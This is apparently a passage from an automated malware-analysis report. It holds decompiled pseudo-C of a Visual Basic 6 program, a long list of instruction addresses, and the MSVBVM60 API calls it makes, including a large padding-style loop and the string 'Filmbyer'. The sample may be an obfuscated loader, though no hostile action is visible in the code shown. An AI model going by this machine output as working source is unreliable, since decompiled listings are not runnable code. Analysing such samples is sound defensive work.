            						_push(0x401f3c);
            						L00401286();
            						_v300 = 0x40d010;
            					}
            					_t664 =  &_v96;
            					L0040128C();
            					_v240 = _t664;
            					_t668 =  *((intOrPtr*)( *_v240 + 0x108))(_v240,  &_v92, _t664,  *((intOrPtr*)( *((intOrPtr*)( *_v300)) + 0x314))( *_v300));
            					asm("fclex");
            					_v244 = _t668;
            					if(_v244 >= 0) {
            						_t40 =  &_v304;
            						 *_t40 = _v304 & 0x00000000;
            						__eflags =  *_t40;
            					} else {
            						_push(0x108);
            						_push(0x401cd4);
            						_push(_v240);
            						_push(_v244);
            						L00401280();
            						_v304 = _t668;
            					}
            					if( *0x40d33c != 0) {
            						_v308 = 0x40d33c;
            					} else {
            						_push(0x40d33c);
            						_push(0x401d04);
            						L00401286();
            						_v308 = 0x40d33c;
            					}
            					_v248 =  *_v308;
            					_v284 = _v92;
            					_v92 = _v92 & 0x00000000;
            					_v112 = _v284;
            					_v120 = 8;
            					_v164 = 0xe3;
            					_v172 = 2;
            					L00401190();
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					L00401190();
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					_t678 =  *((intOrPtr*)( *_v248 + 0x38))(_v248, 0x10, 0x10,  &_v136);
            					asm("fclex");
            					_v252 = _t678;
            					if(_v252 >= 0) {
            						_t66 =  &_v312;
            						 *_t66 = _v312 & 0x00000000;
            						__eflags =  *_t66;
            					} else {
            						_push(0x38);
            						_push(0x401cf4);
            						_push(_v248);
            						_push(_v252);
            						L00401280();
            						_v312 = _t678;
            					}
            					_push( &_v136);
            					_push( &_v156);
            					L00401274();
            					_push( &_v156);
            					_push( &_v56);
            					L0040127A();
            					L0040126E();
            					_push( &_v136);
            					_push( &_v120);
            					_push(2);
            					L00401292();
            					_t758 =  &(_t758[3]);
            				}
            				if( *0x40d010 != 0) {
            					_v316 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v316 = 0x40d010;
            				}
            				_t492 =  &_v96;
            				L0040128C();
            				_v240 = _t492;
            				_t496 =  *((intOrPtr*)( *_v240 + 0x158))(_v240,  &_v92, _t492,  *((intOrPtr*)( *((intOrPtr*)( *_v316)) + 0x300))( *_v316));
            				asm("fclex");
            				_v244 = _t496;
            				if(_v244 >= 0) {
            					_t91 =  &_v320;
            					 *_t91 = _v320 & 0x00000000;
            					__eflags =  *_t91;
            				} else {
            					_push(0x158);
            					_push(0x401d14);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v320 = _t496;
            				}
            				_v192 = 0x633;
            				_v200 = 0x1e68d1;
            				 *((intOrPtr*)( *_a4 + 0x70c))(_a4, _v92,  &_v200,  &_v192,  &_v220);
            				_v48 = _v220;
            				_v44 = _v216;
            				L00401268();
            				L0040126E();
            				if( *0x40d010 != 0) {
            					_v324 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v324 = 0x40d010;
            				}
            				_t508 =  &_v96;
            				L0040128C();
            				_v240 = _t508;
            				_t512 =  *((intOrPtr*)( *_v240 + 0xf8))(_v240,  &_v100, _t508,  *((intOrPtr*)( *((intOrPtr*)( *_v324)) + 0x300))( *_v324));
            				asm("fclex");
            				_v244 = _t512;
            				if(_v244 >= 0) {
            					_t124 =  &_v328;
            					 *_t124 = _v328 & 0x00000000;
            					__eflags =  *_t124;
            				} else {
            					_push(0xf8);
            					_push(0x401d14);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v328 = _t512;
            				}
            				if( *0x40d010 != 0) {
            					_v332 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v332 = 0x40d010;
            				}
            				_t697 =  *((intOrPtr*)( *_v332));
            				_t516 =  &_v104;
            				L0040128C();
            				_v248 = _t516;
            				_t520 =  *((intOrPtr*)( *_v248 + 0x88))(_v248,  &_v200, _t516,  *((intOrPtr*)(_t697 + 0x310))( *_v332));
            				asm("fclex");
            				_v252 = _t520;
            				if(_v252 >= 0) {
            					_t142 =  &_v336;
            					 *_t142 = _v336 & 0x00000000;
            					__eflags =  *_t142;
            				} else {
            					_push(0x88);
            					_push(0x401d24);
            					_push(_v248);
            					_push(_v252);
            					L00401280();
            					_v336 = _t520;
            				}
            				_v204 =  *0x4010f0;
            				_v288 = _v100;
            				_v100 = _v100 & 0x00000000;
            				_v112 = _v288;
            				_v120 = 9;
            				 *_t758 = _v200;
            				 *_t758 =  *0x4010e8;
            				 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v120, _t697, _t697,  &_v204, _t697);
            				_push( &_v104);
            				_push( &_v96);
            				_push(2);
            				L00401262();
            				_t759 =  &(_t758[3]);
            				L0040125C();
            				if( *0x40d010 != 0) {
            					_v340 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v340 = 0x40d010;
            				}
            				_t533 =  &_v96;
            				L0040128C();
            				_v240 = _t533;
            				_t537 =  *((intOrPtr*)( *_v240 + 0x170))(_v240,  &_v92, _t533,  *((intOrPtr*)( *((intOrPtr*)( *_v340)) + 0x30c))( *_v340));
            				asm("fclex");
            				_v244 = _t537;
            				if(_v244 >= 0) {
            					_t177 =  &_v344;
            					 *_t177 = _v344 & 0x00000000;
            					__eflags =  *_t177;
            				} else {
            					_push(0x170);
            					_push(0x401d34);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v344 = _t537;
            				}
            				_v292 = _v92;
            				_v92 = _v92 & 0x00000000;
            				_v112 = _v292;
            				_v120 = 8;
            				_v220 = 0xc96ed9a0;
            				_v216 = 0x5b01;
            				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v220, 0x7cbc2ca0, 0x5afe,  &_v120,  &_v136);
            				L00401256();
            				L0040126E();
            				L0040125C();
            				_t549 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v200);
            				_v240 = _t549;
            				if(_v240 >= 0) {
            					_t207 =  &_v348;
            					 *_t207 = _v348 & 0x00000000;
            					__eflags =  *_t207;
            				} else {
            					_push(0x6f8);
            					_push(0x401b58);
            					_push(_a4);
            					_push(_v240);
            					L00401280();
            					_v348 = _t549;
            				}
            				_v88 = _v200;
            				if( *0x40d010 != 0) {
            					_v352 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v352 = 0x40d010;
            				}
            				_t554 =  &_v96;
            				L0040128C();
            				_v240 = _t554;
            				_t558 =  *((intOrPtr*)( *_v240 + 0x50))(_v240,  &_v192, _t554,  *((intOrPtr*)( *((intOrPtr*)( *_v352)) + 0x310))( *_v352));
            				asm("fclex");
            				_v244 = _t558;
            				if(_v244 >= 0) {
            					_t227 =  &_v356;
            					 *_t227 = _v356 & 0x00000000;
            					__eflags =  *_t227;
            				} else {
            					_push(0x50);
            					_push(0x401d24);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v356 = _t558;
            				}
            				if( *0x40d010 != 0) {
            					_v360 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v360 = 0x40d010;
            				}
            				_t562 =  &_v100;
            				L0040128C();
            				_v248 = _t562;
            				_t566 =  *((intOrPtr*)( *_v248 + 0x78))(_v248,  &_v200, _t562,  *((intOrPtr*)( *((intOrPtr*)( *_v360)) + 0x30c))( *_v360));
            				asm("fclex");
            				_v252 = _t566;
            				if(_v252 >= 0) {
            					_t245 =  &_v364;
            					 *_t245 = _v364 & 0x00000000;
            					__eflags =  *_t245;
            				} else {
            					_push(0x78);
            					_push(0x401d34);
            					_push(_v248);
            					_push(_v252);
            					L00401280();
            					_v364 = _t566;
            				}
            				_v204 = _v200;
            				 *((intOrPtr*)( *_a4 + 0x718))(_a4, _v192,  &_v204,  &_v196);
            				_v60 = _v196;
            				_push( &_v100);
            				_push( &_v96);
            				_push(2);
            				L00401262();
            				_t760 =  &(_t759[3]);
            				if( *0x40d010 != 0) {
            					_v368 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v368 = 0x40d010;
            				}
            				_t713 =  *((intOrPtr*)( *_v368));
            				_t578 =  &_v96;
            				L0040128C();
            				_v240 = _t578;
            				_t582 =  *((intOrPtr*)( *_v240 + 0x68))(_v240,  &_v200, _t578,  *((intOrPtr*)(_t713 + 0x30c))( *_v368));
            				asm("fclex");
            				_v244 = _t582;
            				if(_v244 >= 0) {
            					_t275 =  &_v372;
            					 *_t275 = _v372 & 0x00000000;
            					__eflags =  *_t275;
            				} else {
            					_push(0x68);
            					_push(0x401d34);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v372 = _t582;
            				}
            				_v220 =  *0x4010e0;
            				_v296 = _v200;
            				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v220, _t713,  &_v228);
            				_v84 = _v228;
            				L0040126E();
            				_t590 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
            				asm("fclex");
            				_v240 = _t590;
            				if(_v240 >= 0) {
            					_t295 =  &_v376;
            					 *_t295 = _v376 & 0x00000000;
            					__eflags =  *_t295;
            				} else {
            					_push(0x2b4);
            					_push(0x401b28);
            					_push(_a4);
            					_push(_v240);
            					L00401280();
            					_v376 = _t590;
            				}
            				_v272 = 0x5ae61;
            				_v268 = 1;
            				_v32 = _v32 & 0x00000000;
            				while(_v32 <= _v272) {
            					if( *0x40d010 != 0) {
            						_v380 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v380 = 0x40d010;
            					}
            					_t597 =  &_v96;
            					L0040128C();
            					_v240 = _t597;
            					_t601 =  *((intOrPtr*)( *_v240 + 0x218))(_v240,  &_v92, _t597,  *((intOrPtr*)( *((intOrPtr*)( *_v380)) + 0x308))( *_v380));
            					asm("fclex");
            					_v244 = _t601;
            					if(_v244 >= 0) {
            						_t322 =  &_v384;
            						 *_t322 = _v384 & 0x00000000;
            						__eflags =  *_t322;
            					} else {
            						_push(0x218);
            						_push(0x401d44);
            						_push(_v240);
            						_push(_v244);
            						L00401280();
            						_v384 = _t601;
            					}
            					if( *0x40d010 != 0) {
            						_v388 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v388 = 0x40d010;
            					}
            					_t605 =  &_v100;
            					L0040128C();
            					_v248 = _t605;
            					_t609 =  *((intOrPtr*)( *_v248 + 0x138))(_v248,  &_v200, _t605,  *((intOrPtr*)( *((intOrPtr*)( *_v388)) + 0x30c))( *_v388));
            					asm("fclex");
            					_v252 = _t609;
            					if(_v252 >= 0) {
            						_t340 =  &_v392;
            						 *_t340 = _v392 & 0x00000000;
            						__eflags =  *_t340;
            					} else {
            						_push(0x138);
            						_push(0x401d34);
            						_push(_v248);
            						_push(_v252);
            						L00401280();
            						_v392 = _t609;
            					}
            					if( *0x40d010 != 0) {
            						_v396 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v396 = 0x40d010;
            					}
            					_t726 =  *((intOrPtr*)( *_v396));
            					_t613 =  &_v104;
            					L0040128C();
            					_v256 = _t613;
            					_t617 =  *((intOrPtr*)( *_v256 + 0x188))(_v256,  &_v204, _t613,  *((intOrPtr*)(_t726 + 0x300))( *_v396));
            					asm("fclex");
            					_v260 = _t617;
            					if(_v260 >= 0) {
            						_t358 =  &_v400;
            						 *_t358 = _v400 & 0x00000000;
            						__eflags =  *_t358;
            					} else {
            						_push(0x188);
            						_push(0x401d14);
            						_push(_v256);
            						_push(_v260);
            						L00401280();
            						_v400 = _t617;
            					}
            					_v164 = _v200;
            					_v172 = 3;
            					_v296 = _v92;
            					_v92 = _v92 & 0x00000000;
            					_v112 = _v296;
            					_v120 = 8;
            					_v208 = 0x8227e0;
            					_v384 =  *0x4010d8;
            					L00401190();
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					L00401190();
            					_t750 =  &_v120;
            					_t745 = _t760;
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					_t627 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v208, 0x10, 0x10, _t726, _t726, _v204,  &_v212);
            					_v264 = _t627;
            					if(_v264 >= 0) {
            						_t384 =  &_v404;
            						 *_t384 = _v404 & 0x00000000;
            						__eflags =  *_t384;
            					} else {
            						_push(0x6fc);
            						_push(0x401b58);
            						_push(_a4);
            						_push(_v264);
            						L00401280();
            						_v404 = _t627;
            					}
            					_v28 = _v212;
            					_push( &_v104);
            					_push( &_v100);
            					_push( &_v96);
            					_push(3);
            					L00401262();
            					_t760 =  &(_t760[4]);
            					L0040125C();
            					if( *0x40d010 != 0) {
            						_v408 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v408 = 0x40d010;
            					}
            					_t730 =  *((intOrPtr*)( *_v408));
            					_t634 =  &_v96;
            					L0040128C();
            					_v240 = _t634;
            					_t638 =  *((intOrPtr*)( *_v240 + 0x70))(_v240,  &_v200, _t634,  *((intOrPtr*)(_t730 + 0x310))( *_v408));
            					asm("fclex");
            					_v244 = _t638;
            					if(_v244 >= 0) {
            						_t408 =  &_v412;
            						 *_t408 = _v412 & 0x00000000;
            						__eflags =  *_t408;
            					} else {
            						_push(0x70);
            						_push(0x401d24);
            						_push(_v240);
            						_push(_v244);
            						L00401280();
            						_v412 = _t638;
            					}
            					_v228 =  *0x4010d0;
            					_v220 = 0x445fc8f0;
            					_v216 = 0x5af7;
            					 *_t760 = _v200;
            					_t643 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v220, _t730,  &_v228, 0xf6292);
            					_v248 = _t643;
            					if(_v248 >= 0) {
            						_t424 =  &_v416;
            						 *_t424 = _v416 & 0x00000000;
            						__eflags =  *_t424;
            					} else {
            						_push(0x700);
            						_push(0x401b58);
            						_push(_a4);
            						_push(_v248);
            						L00401280();
            						_v416 = _t643;
            					}
            					_t731 =  &_v96;
            					L0040126E();
            					_v228 = 0xde5a6cd0;
            					_v224 = 0x5af7;
            					_v220 = 0xc72725d0;
            					_v216 = 0x5afc;
            					_t649 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v220,  &_v228,  &_v236);
            					_v240 = _t649;
            					if(_v240 >= 0) {
            						_t442 =  &_v420;
            						 *_t442 = _v420 & 0x00000000;
            						__eflags =  *_t442;
            					} else {
            						_push(0x704);
            						_push(0x401b58);
            						_push(_a4);
            						_push(_v240);
            						L00401280();
            						_v420 = _t649;
            					}
            					_v40 = _v236;
            					_v36 = _v232;
            					_t653 = _v32 + _v268;
            					if(_t653 < 0) {
            						L0040124A();
            						_push(_t754);
            						_push(_t731);
            						_push(_t731);
            						_push(0x401196);
            						_push( *[fs:0x0]);
            						 *[fs:0x0] = _t760;
            						_t655 = 0x28;
            						L00401190();
            						_push(_t685);
            						_push(_t750);
            						_push(_t745);
            						_v460 = _t760;
            						_v456 = 0x401110;
            						L00401244();
            						asm("fldz");
            						L00401214();
            						L0040123E();
            						asm("fcomp qword [0x401108]");
            						asm("fnstsw ax");
            						asm("sahf");
            						if(__eflags != 0) {
            							__eflags =  *0x40d33c;
            							if( *0x40d33c != 0) {
            								_v60 = 0x40d33c;
            							} else {
            								_push(0x40d33c);
            								_push(0x401d04);
            								L00401286();
            								_v60 = 0x40d33c;
            							}
            							_t657 =  *_v60;
            							_v48 = _t657;
            							L00401238();
            							_t658 =  &_v44;
            							L0040128C();
            							_t655 =  *((intOrPtr*)( *_v48 + 0x40))(_v48, _t658, _t658, _t657, _v32, 0x401d6c, L"Filmbyer");
            							asm("fclex");
            							_v52 = _t655;
            							__eflags = _v52;
            							if(_v52 >= 0) {
            								_t468 =  &_v64;
            								 *_t468 = _v64 & 0x00000000;
            								__eflags =  *_t468;
            							} else {
            								_push(0x40);
            								_push(0x401cf4);
            								_push(_v48);
            								_push(_v52);
            								L00401280();
            								_v64 = _t655;
            							}
            							L0040126E();
            						}
            						asm("wait");
            						_push(0x40b833);
            						L00401268();
            						L0040126E();
            						return _t655;
            					} else {
            						_v32 = _t653;
            						continue;
            					}
            					L113:
            				}
            				 *((intOrPtr*)(0x278260 + _v312))(0x19129e);
            				_push(0x40b714);
            				_t593 =  &_v56;
            				_push(_t593);
            				_push(0);
            				L00401250();
            				L0040125C();
            				return _t593;
            				goto L113;
            			}














































































































































            0x0040a804
            0x0040a805
            0x0040a807
            0x0040a816
            0x0040a822
            0x0040a82a
            0x0040a82d
            0x0040a83a
            0x0040a843
            0x0040a84e
            0x0040a851
            0x0040a85b
            0x0040a86e
            0x0040a876
            0x0040a87d
            0x0040a87e
            0x0040a883
            0x0040a88d
            0x0040a89d
            0x0040a89e
            0x0040a8a4
            0x0040a8a5
            0x0040a8aa
            0x0040a8b7
            0x0040a8bb
            0x0040a8bc
            0x0040a8be
            0x0040a8c3
            0x0040a8cf
            0x0040a8dc
            0x0040a8f9
            0x0040a8de
            0x0040a8de
            0x0040a8e3
            0x0040a8e8
            0x0040a8ed
            0x0040a8ed
            0x0040a91d
            0x0040a921
            0x0040a926
            0x0040a93e
            0x0040a944
            0x0040a946
            0x0040a953
            0x0040a978
            0x0040a978
            0x0040a978
            0x0040a955
            0x0040a955
            0x0040a95a
            0x0040a95f
            0x0040a965
            0x0040a96b
            0x0040a970
            0x0040a970
            0x0040a986
            0x0040a9a3
            0x0040a988
            0x0040a988
            0x0040a98d
            0x0040a992
            0x0040a997
            0x0040a997
            0x0040a9b5
            0x0040a9be
            0x0040a9c4
            0x0040a9ce
            0x0040a9d1
            0x0040a9d8
            0x0040a9e2
            0x0040a9f6
            0x0040aa00
            0x0040aa01
            0x0040aa02
            0x0040aa03
            0x0040aa07
            0x0040aa14
            0x0040aa15
            0x0040aa16
            0x0040aa17
            0x0040aa26
            0x0040aa29
            0x0040aa2b
            0x0040aa38
            0x0040aa5a
            0x0040aa5a
            0x0040aa5a
            0x0040aa3a
            0x0040aa3a
            0x0040aa3c
            0x0040aa41
            0x0040aa47
            0x0040aa4d
            0x0040aa52
            0x0040aa52
            0x0040aa67
            0x0040aa6e
            0x0040aa6f
            0x0040aa7a
            0x0040aa7e
            0x0040aa7f
            0x0040aa87
            0x0040aa92
            0x0040aa96
            0x0040aa97
            0x0040aa99
            0x0040aa9e
            0x0040aa9e
            0x0040aaa8
            0x0040aac5
            0x0040aaaa
            0x0040aaaa
            0x0040aaaf
            0x0040aab4
            0x0040aab9
            0x0040aab9
            0x0040aae9
            0x0040aaed
            0x0040aaf2
            0x0040ab0a
            0x0040ab10
            0x0040ab12
            0x0040ab1f
            0x0040ab44
            0x0040ab44
            0x0040ab44
            0x0040ab21
            0x0040ab21
            0x0040ab26
            0x0040ab2b
            0x0040ab31
            0x0040ab37
            0x0040ab3c
            0x0040ab3c
            0x0040ab4b
            0x0040ab54
            0x0040ab7e
            0x0040ab8a
            0x0040ab93
            0x0040ab99
            0x0040aba1
            0x0040abad
            0x0040abca
            0x0040abaf
            0x0040abaf
            0x0040abb4
            0x0040abb9
            0x0040abbe
            0x0040abbe
            0x0040abee
            0x0040abf2
            0x0040abf7
            0x0040ac0f
            0x0040ac15
            0x0040ac17
            0x0040ac24
            0x0040ac49
            0x0040ac49
            0x0040ac49
            0x0040ac26
            0x0040ac26
            0x0040ac2b
            0x0040ac30
            0x0040ac36
            0x0040ac3c
            0x0040ac41
            0x0040ac41
            0x0040ac57
            0x0040ac74
            0x0040ac59
            0x0040ac59
            0x0040ac5e
            0x0040ac63
            0x0040ac68
            0x0040ac68
            0x0040ac8e
            0x0040ac98
            0x0040ac9c
            0x0040aca1
            0x0040acbc
            0x0040acc2
            0x0040acc4
            0x0040acd1
            0x0040acf6
            0x0040acf6
            0x0040acf6
            0x0040acd3
            0x0040acd3
            0x0040acd8
            0x0040acdd
            0x0040ace3
            0x0040ace9
            0x0040acee
            0x0040acee
            0x0040ad03
            0x0040ad0c
            0x0040ad12
            0x0040ad1c
            0x0040ad1f
            0x0040ad2d
            0x0040ad3f
            0x0040ad4e
            0x0040ad57
            0x0040ad5b
            0x0040ad5c
            0x0040ad5e
            0x0040ad63
            0x0040ad69
            0x0040ad75
            0x0040ad92
            0x0040ad77
            0x0040ad77
            0x0040ad7c
            0x0040ad81
            0x0040ad86
            0x0040ad86
            0x0040adb6
            0x0040adba
            0x0040adbf
            0x0040add7
            0x0040addd
            0x0040addf
            0x0040adec
            0x0040ae11
            0x0040ae11
            0x0040ae11
            0x0040adee
            0x0040adee
            0x0040adf3
            0x0040adf8
            0x0040adfe
            0x0040ae04
            0x0040ae09
            0x0040ae09
            0x0040ae1b
            0x0040ae21
            0x0040ae2b
            0x0040ae2e
            0x0040ae35
            0x0040ae3f
            0x0040ae6d
            0x0040ae7c
            0x0040ae84
            0x0040ae8c
            0x0040aea0
            0x0040aea6
            0x0040aeb3
            0x0040aed5
            0x0040aed5
            0x0040aed5
            0x0040aeb5
            0x0040aeb5
            0x0040aeba
            0x0040aebf
            0x0040aec2
            0x0040aec8
            0x0040aecd
            0x0040aecd
            0x0040aee2
            0x0040aeec
            0x0040af09
            0x0040aeee
            0x0040aeee
            0x0040aef3
            0x0040aef8
            0x0040aefd
            0x0040aefd
            0x0040af2d
            0x0040af31
            0x0040af36
            0x0040af51
            0x0040af54
            0x0040af56
            0x0040af63
            0x0040af85
            0x0040af85
            0x0040af85
            0x0040af65
            0x0040af65
            0x0040af67
            0x0040af6c
            0x0040af72
            0x0040af78
            0x0040af7d
            0x0040af7d
            0x0040af93
            0x0040afb0
            0x0040af95
            0x0040af95
            0x0040af9a
            0x0040af9f
            0x0040afa4
            0x0040afa4
            0x0040afd4
            0x0040afd8
            0x0040afdd
            0x0040aff8
            0x0040affb
            0x0040affd
            0x0040b00a
            0x0040b02c
            0x0040b02c
            0x0040b02c
            0x0040b00c
            0x0040b00c
            0x0040b00e
            0x0040b013
            0x0040b019
            0x0040b01f
            0x0040b024
            0x0040b024
            0x0040b039
            0x0040b05b
            0x0040b068
            0x0040b06f
            0x0040b073
            0x0040b074
            0x0040b076
            0x0040b07b
            0x0040b085
            0x0040b0a2
            0x0040b087
            0x0040b087
            0x0040b08c
            0x0040b091
            0x0040b096
            0x0040b096
            0x0040b0bc
            0x0040b0c6
            0x0040b0ca
            0x0040b0cf
            0x0040b0ea
            0x0040b0ed
            0x0040b0ef
            0x0040b0fc
            0x0040b11e
            0x0040b11e
            0x0040b11e
            0x0040b0fe
            0x0040b0fe
            0x0040b100
            0x0040b105
            0x0040b10b
            0x0040b111
            0x0040b116
            0x0040b116
            0x0040b12b
            0x0040b13f
            0x0040b151
            0x0040b15d
            0x0040b163
            0x0040b170
            0x0040b176
            0x0040b178
            0x0040b185
            0x0040b1a7
            0x0040b1a7
            0x0040b1a7
            0x0040b187
            0x0040b187
            0x0040b18c
            0x0040b191
            0x0040b194
            0x0040b19a
            0x0040b19f
            0x0040b19f
            0x0040b1ae
            0x0040b1b8
            0x0040b1c2
            0x0040b1da
            0x0040b1f0
            0x0040b20d
            0x0040b1f2
            0x0040b1f2
            0x0040b1f7
            0x0040b1fc
            0x0040b201
            0x0040b201
            0x0040b231
            0x0040b235
            0x0040b23a
            0x0040b252
            0x0040b258
            0x0040b25a
            0x0040b267
            0x0040b28c
            0x0040b28c
            0x0040b28c
            0x0040b269
            0x0040b269
            0x0040b26e
            0x0040b273
            0x0040b279
            0x0040b27f
            0x0040b284
            0x0040b284
            0x0040b29a
            0x0040b2b7
            0x0040b29c
            0x0040b29c
            0x0040b2a1
            0x0040b2a6
            0x0040b2ab
            0x0040b2ab
            0x0040b2db
            0x0040b2df
            0x0040b2e4
            0x0040b2ff
            0x0040b305
            0x0040b307
            0x0040b314
            0x0040b339
            0x0040b339
            0x0040b339
            0x0040b316
            0x0040b316
            0x0040b31b
            0x0040b320
            0x0040b326
            0x0040b32c
            0x0040b331
            0x0040b331
            0x0040b347
            0x0040b364
            0x0040b349
            0x0040b349
            0x0040b34e
            0x0040b353
            0x0040b358
            0x0040b358
            0x0040b37e
            0x0040b388
            0x0040b38c
            0x0040b391
            0x0040b3ac
            0x0040b3b2
            0x0040b3b4
            0x0040b3c1
            0x0040b3e6
            0x0040b3e6
            0x0040b3e6
            0x0040b3c3
            0x0040b3c3
            0x0040b3c8
            0x0040b3cd
            0x0040b3d3
            0x0040b3d9
            0x0040b3de
            0x0040b3de
            0x0040b3f3
            0x0040b3f9
            0x0040b406
            0x0040b40c
            0x0040b416
            0x0040b419
            0x0040b420
            0x0040b43f
            0x0040b445
            0x0040b452
            0x0040b453
            0x0040b454
            0x0040b455
            0x0040b459
            0x0040b45e
            0x0040b461
            0x0040b463
            0x0040b464
            0x0040b465
            0x0040b466
            0x0040b476
            0x0040b47c
            0x0040b489
            0x0040b4ab
            0x0040b4ab
            0x0040b4ab
            0x0040b48b
            0x0040b48b
            0x0040b490
            0x0040b495
            0x0040b498
            0x0040b49e
            0x0040b4a3
            0x0040b4a3
            0x0040b4b8
            0x0040b4be
            0x0040b4c2
            0x0040b4c6
            0x0040b4c7
            0x0040b4c9
            0x0040b4ce
            0x0040b4d4
            0x0040b4e0
            0x0040b4fd
            0x0040b4e2
            0x0040b4e2
            0x0040b4e7
            0x0040b4ec
            0x0040b4f1
            0x0040b4f1
            0x0040b517
            0x0040b521
            0x0040b525
            0x0040b52a
            0x0040b545
            0x0040b548
            0x0040b54a
            0x0040b557
            0x0040b579
            0x0040b579
            0x0040b579
            0x0040b559
            0x0040b559
            0x0040b55b
            0x0040b560
            0x0040b566
            0x0040b56c
            0x0040b571
            0x0040b571
            0x0040b586
            0x0040b58c
            0x0040b596
            0x0040b5b3
            0x0040b5c5
            0x0040b5cb
            0x0040b5d8
            0x0040b5fa
            0x0040b5fa
            0x0040b5fa
            0x0040b5da
            0x0040b5da
            0x0040b5df
            0x0040b5e4
            0x0040b5e7
            0x0040b5ed
            0x0040b5f2
            0x0040b5f2
            0x0040b601
            0x0040b604
            0x0040b609
            0x0040b613
            0x0040b61d
            0x0040b627
            0x0040b64e
            0x0040b654
            0x0040b661
            0x0040b683
            0x0040b683
            0x0040b683
            0x0040b663
            0x0040b663
            0x0040b668
            0x0040b66d
            0x0040b670
            0x0040b676
            0x0040b67b
            0x0040b67b
            0x0040b690
            0x0040b699
            0x0040b1cb
            0x0040b1d1
            0x0040b733
            0x0040b738
            0x0040b73b
            0x0040b73c
            0x0040b73d
            0x0040b748
            0x0040b749
            0x0040b752
            0x0040b753
            0x0040b758
            0x0040b759
            0x0040b75a
            0x0040b75b
            0x0040b75e
            0x0040b76b
            0x0040b770
            0x0040b772
            0x0040b777
            0x0040b77c
            0x0040b782
            0x0040b784
            0x0040b785
            0x0040b78b
            0x0040b792
            0x0040b7ac
            0x0040b794
            0x0040b794
            0x0040b799
            0x0040b79e
            0x0040b7a3
            0x0040b7a3
            0x0040b7b6
            0x0040b7b8
            0x0040b7c8
            0x0040b7ce
            0x0040b7d2
            0x0040b7e0
            0x0040b7e3
            0x0040b7e5
            0x0040b7e8
            0x0040b7ec
            0x0040b805
            0x0040b805
            0x0040b805
            0x0040b7ee
            0x0040b7ee
            0x0040b7f0
            0x0040b7f5
            0x0040b7f8
            0x0040b7fb
            0x0040b800
            0x0040b800
            0x0040b80c
            0x0040b80c
            0x0040b811
            0x0040b812
            0x0040b825
            0x0040b82d
            0x0040b832
            0x0040b1d7
            0x0040b1d7
            0x00000000
            0x0040b1d7
            0x00000000
            0x0040b1d1
            0x0040b6ae
            0x0040b6b0
            0x0040b700
            0x0040b703
            0x0040b704
            0x0040b706
            0x0040b70e
            0x0040b713
            0x00000000

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040A822
            • __vbaVarDup.MSVBVM60 ref: 0040A86E
            • #544.MSVBVM60(?,?), ref: 0040A87E
            • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0040A8A5
            • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0040A8BE
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,00401196), ref: 0040A8E8
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040A921
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401CD4,00000108), ref: 0040A96B
            • __vbaNew2.MSVBVM60(00401D04,0040D33C), ref: 0040A992
            • __vbaChkstk.MSVBVM60(?), ref: 0040A9F6
            • __vbaChkstk.MSVBVM60(?), ref: 0040AA07
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401CF4,00000038), ref: 0040AA4D
            • __vbaVar2Vec.MSVBVM60(?,?), ref: 0040AA6F
            • __vbaAryMove.MSVBVM60(?,?,?,?), ref: 0040AA7F
            • __vbaFreeObj.MSVBVM60(?,?,?,?), ref: 0040AA87
            • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?), ref: 0040AA99
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,00401196), ref: 0040AAB4
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040AAED
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D14,00000158), ref: 0040AB37
            • __vbaFreeStr.MSVBVM60 ref: 0040AB99
            • __vbaFreeObj.MSVBVM60 ref: 0040ABA1
            • __vbaNew2.MSVBVM60(00401F3C,0040D010), ref: 0040ABB9
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ABF2
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D14,000000F8), ref: 0040AC3C
